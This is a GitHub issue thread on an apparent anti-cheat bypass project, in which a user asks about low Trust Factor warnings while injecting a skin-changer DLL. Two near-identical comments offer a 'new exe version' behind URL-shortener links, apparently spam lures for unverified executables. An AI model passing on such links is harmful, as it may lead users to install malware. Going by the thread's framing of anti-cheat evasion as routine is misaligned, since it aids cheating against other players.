### ISSUE TITLE
people playing with me in a lobby receive a message about trust factor

### ISSUE THREAD

**Issue by mrjshzk** [danielkrupinski/VAC-Bypass#82]
people playing with me in a lobby receive a message about trust factor: "Your matchmaking experience will be significantly affect because Trust Factor of ***ME*** is substancially lower than yours.

I have been using no cheats and only this injected dll https://github.com/advancedfx/nSkinz
Anyone knows or has something similar?

**Comment by alextrack2013** [comment]
bc playing without vac lowers ur trust factor

**Comment by lokumenia** [comment]
I uploaded a new exe version here:
shorturl.at/inpU6

**Comment by demon124123** [comment]
I uploaded a new exe version here:
shorturl.at/ikvN3
